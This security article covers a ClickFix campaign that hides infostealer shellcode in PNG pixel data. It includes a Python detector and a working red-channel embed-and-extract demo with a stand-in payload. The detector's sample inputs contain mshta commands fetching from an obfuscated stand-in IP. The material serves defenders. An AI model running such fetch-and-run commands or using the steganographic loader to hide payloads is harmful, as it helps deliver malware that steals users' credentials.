Cybercriminals are combining the "ClickFix" social-engineering lure with steganography, hiding malicious payloads inside the pixel data of otherwise ordinary PNG image files. The campaign, analysed by Huntress, changes the delivery mechanics of information-stealing malware while keeping the same entry point: a user who runs a command by hand.
The ClickFix chain ensnares users by tricking them into executing a command themselves through the Windows Run prompt. The initial lures are convincing fakes such as "I am not a robot" verification screens or notifications mimicking Windows Update. The page silently places a command on the victim's clipboard, then instructs them to press Win+R, paste, and press Enter, which starts the multi-stage attack.
Steganographic Payload Concealment in ClickFix Attacks
The most notable aspect of this campaign is how the final stages are concealed. Rather than appending malicious data after the end of an image file, which is easy to spot, the attackers use a custom steganographic scheme that encodes shellcode in the pixel values themselves, primarily in the red channel. The loader reads those pixels, reconstructs and decrypts the shellcode entirely in memory, and never writes a separate payload file, which leaves little for file-based scanners to match on.
According to Huntress researchers, this campaign emerged in October 2023 and has since evolved through two distinct variants. Early “Human Verification” lures have been largely replaced by more convincing fake Windows Update screens. These newer lures present a full-screen, realistic mimicry of Microsoft updates, complete with “Working on updates” animations, before prompting the user to execute the ClickFix command.
The infection chain begins with an `mshta.exe` command whose remote URL uses an IP address with its second octet written in hexadecimal, a spelling the legacy Windows address parser accepts but simple dotted-decimal pattern matching does not recognise. That command retrieves a PowerShell loader, which decrypts and reflectively loads a .NET assembly. The assembly is the steganographic loader: it carries an encrypted PNG as an embedded manifest resource and extracts the shellcode hidden in that image.
The extraction routine works on the bitmap's raw pixel data. For each pixel it computes the byte offset from the pixel's row and column, reads the red channel value and XORs it with 114 to recover one byte of the encrypted shellcode. The recovered shellcode is itself a Donut-generated payload; Donut wraps a .NET assembly as position-independent shellcode that can be executed in memory, so the final stealer is loaded without ever being dropped to disk as a file.
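The hexadecimal-octet trick in the `mshta.exe` command deserves a concrete detector. Below is an added Python example written for this article, not Huntress's code and not the campaign's actual command line: it canonicalises the address spellings a legacy inet_addr-style parser accepts (hexadecimal `0x` octets, octal leading-zero octets, and forms with fewer than four components) and flags mshta command lines whose remote host is written in one of those non-canonical forms. The sample process command lines and the TEST-NET-2 address 198.51.100.7 are constructed for the example and are not indicators from the campaign.

```python
import re

# Matches an mshta invocation anywhere in a command line (bare name or full path).
MSHTA_RE = re.compile(r"(?:^|[\\\s\"'])mshta(?:\.exe)?\b", re.IGNORECASE)
URL_HOST_RE = re.compile(r"https?://([^/\s\"'?#:]+)", re.IGNORECASE)


def normalize_legacy_ip(host: str):
    """Resolve the inet_addr-style spellings Windows accepts (hex 0x.. octets,
    octal 0.. octets, and fewer than four dotted components) to canonical
    dotted decimal.  Returns None if host is not such an address."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    vals = []
    for p in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]+", p):
            vals.append(int(p[2:], 16))
        elif re.fullmatch(r"0[0-7]+", p):
            vals.append(int(p, 8))
        elif re.fullmatch(r"[0-9]+", p):
            vals.append(int(p, 10))
        else:
            return None
    # In the short forms the last component fills all remaining bytes.
    tail_bytes = 5 - len(vals)
    *lead, last = vals
    if any(v > 255 for v in lead) or last >= 1 << (8 * tail_bytes):
        return None
    n = 0
    for v in lead:
        n = (n << 8) | v
    n = (n << (8 * tail_bytes)) | last
    return ".".join(str((n >> s) & 0xFF) for s in (24, 16, 8, 0))


def inspect_mshta(cmdline: str):
    """Return a verdict dict for an mshta command line, or None if it is not mshta."""
    if not MSHTA_RE.search(cmdline):
        return None
    verdict = {"remote": False, "obfuscated_ip": False, "host": None, "ip": None}
    m = URL_HOST_RE.search(cmdline)
    if m:
        host = m.group(1)
        ip = normalize_legacy_ip(host)
        verdict.update(remote=True, host=host, ip=ip,
                       obfuscated_ip=ip is not None and ip != host)
    return verdict


# Constructed process-creation command lines; the address is RFC 5737
# TEST-NET-2 space written three different ways, not a campaign indicator.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\mshta.exe" http://198.0x33.100.7/verify',
    r"mshta https://0xC6336407/x",
    r"mshta.exe C:\Tools\report.hta",
    r'powershell.exe -NoProfile -Command "Get-Date"',
]


def suspicious_lines(lines=SAMPLE_CMDLINES):
    """Lines where mshta fetches from an IP spelled in a non-canonical form."""
    return [line for line in lines
            if (v := inspect_mshta(line)) and v["obfuscated_ip"]]


if __name__ == "__main__":
    for line in suspicious_lines():
        print(inspect_mshta(line)["ip"], "<-", line)
```

Two practical notes. First, canonicalise before matching against blocklists; an indicator stored as `198.51.100.7` will never match the raw string `198.0x33.100.7`. Second, `mshta.exe` fetching anything over HTTP from an IP literal is already unusual in most environments, so the `remote` flag alone is a reasonable lower-severity alert even when the address is written plainly.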
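The red-channel scheme is simple enough to show end to end. The following is an added Python example written for this article, not Huntress's code and not the campaign's loader: it embeds a constructed payload in the red channel of an RGB bitmap (XOR 114 per byte), serialises the bitmap as a real PNG using only the standard library, parses the PNG back, and recovers the payload by computing each pixel's offset from its row and column exactly as the article describes. Two details are assumptions of the example, since the article does not state them: a 4-byte big-endian length prefix tells the extractor how many bytes to read, and green/blue hold deterministic filler. The outer encryption of the PNG resource and the Donut stage are deliberately left out.

```python
import struct
import zlib

# Value the article reports for the red-channel XOR.
XOR_KEY = 114
PNG_SIG = b"\x89PNG\r\n\x1a\n"


def embed_in_red(payload: bytes, width: int, height: int) -> bytes:
    """Return a raw 8-bit RGB bitmap (row-major, 3 bytes per pixel) whose red
    channel carries a 4-byte big-endian length prefix followed by the payload,
    each byte XORed with XOR_KEY.  The length prefix is an assumption of this
    example; the article does not say how the real loader learns the size.
    Green and blue hold deterministic filler so the image is not all-black."""
    data = struct.pack(">I", len(payload)) + payload
    if len(data) > width * height:
        raise ValueError("cover image too small for payload")
    pixels = bytearray(width * height * 3)
    for i in range(width * height):
        pixels[i * 3 + 1] = (i * 7) & 0xFF
        pixels[i * 3 + 2] = (i * 13) & 0xFF
    for i, b in enumerate(data):
        pixels[i * 3] = b ^ XOR_KEY
    return bytes(pixels)


def extract_from_red(pixels: bytes, width: int) -> bytes:
    """Mirror of the loader: derive each pixel's byte offset from its row and
    column (stride = width * 3 bytes), read the red byte, XOR it with XOR_KEY."""
    def red_at(index: int) -> int:
        row, col = divmod(index, width)
        return pixels[row * width * 3 + col * 3] ^ XOR_KEY
    (length,) = struct.unpack(">I", bytes(red_at(i) for i in range(4)))
    return bytes(red_at(4 + i) for i in range(length))


def _chunk(tag: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(tag + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)


def write_png(pixels: bytes, width: int, height: int) -> bytes:
    """Minimal PNG encoder: 8-bit RGB, no interlace, filter type 0 on every row."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    stride = width * 3
    raw = b"".join(b"\x00" + pixels[y * stride:(y + 1) * stride] for y in range(height))
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_png(data: bytes):
    """Minimal PNG decoder for images produced by write_png (8-bit RGB,
    filter type 0 only).  Returns (pixels, width, height)."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos < len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        tag = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if (depth, ctype) != (8, 2):
                raise ValueError("example handles 8-bit RGB only")
        elif tag == b"IDAT":
            idat += body
        pos += 12 + length
    raw = zlib.decompress(idat)
    stride = width * 3
    rows = []
    for y in range(height):
        line = raw[y * (stride + 1):(y + 1) * (stride + 1)]
        if line[0] != 0:
            raise ValueError("example handles filter type 0 only")
        rows.append(line[1:])
    return b"".join(rows), width, height


# Constructed stand-in for the encrypted shellcode; not real shellcode.
SAMPLE_PAYLOAD = b"stand-in for encrypted Donut shellcode\x00\x01\x72\xff"


def round_trip(payload: bytes = SAMPLE_PAYLOAD, width: int = 16, height: int = 16) -> bytes:
    """Embed, serialise to PNG, parse the PNG back, extract: what the loader does."""
    png = write_png(embed_in_red(payload, width, height), width, height)
    pixels, w, _ = read_png(png)
    return extract_from_red(pixels, w)


if __name__ == "__main__":
    print(round_trip() == SAMPLE_PAYLOAD)
```

The point for defenders is in `read_png` and `extract_from_red`: the PNG is structurally valid and decodes to a plausible image, so a scanner that only checks the file format, or only looks for data appended after `IEND`, sees nothing. Detecting this statistically from the image alone is unreliable; the practical signal is the process that embeds a PNG as a resource and then walks its pixels in memory.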
Huntress researchers have identified that the final payloads delivered through this sophisticated method include prevalent information-stealing malware such as LummaC2 and Rhadamanthys. These malware families are specifically designed to pilfer sensitive user credentials and financial information from compromised systems.
This campaign highlights the continuous innovation by threat actors in evading detection. By embedding payloads within the pixel data of images rather than relying on conventional file structures, attackers significantly complicate analysis and bypass signature-based detection systems. However, the fundamental success of these attacks still hinges on social engineering – convincing users to manually execute commands.
Organizations looking to defend against these threats should prioritize user awareness training that names the paste-and-run pattern explicitly: no legitimate verification or update flow asks you to press Win+R and paste a command. Technical controls help as well. The Run box can be removed with the Explorer "NoRun" policy (the Group Policy setting "Remove Run menu from Start Menu", or the NoRun DWORD under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer); this blocks the specific vector described here, but not variants that steer the victim to a PowerShell window or the File Explorer address bar instead. Because the payload exists only in memory, defensive strategies must also incorporate behavioral analysis, for example alerting on `mshta.exe` or PowerShell launched as a child of explorer.exe with a remote URL on the command line, together with memory inspection of the resulting processes.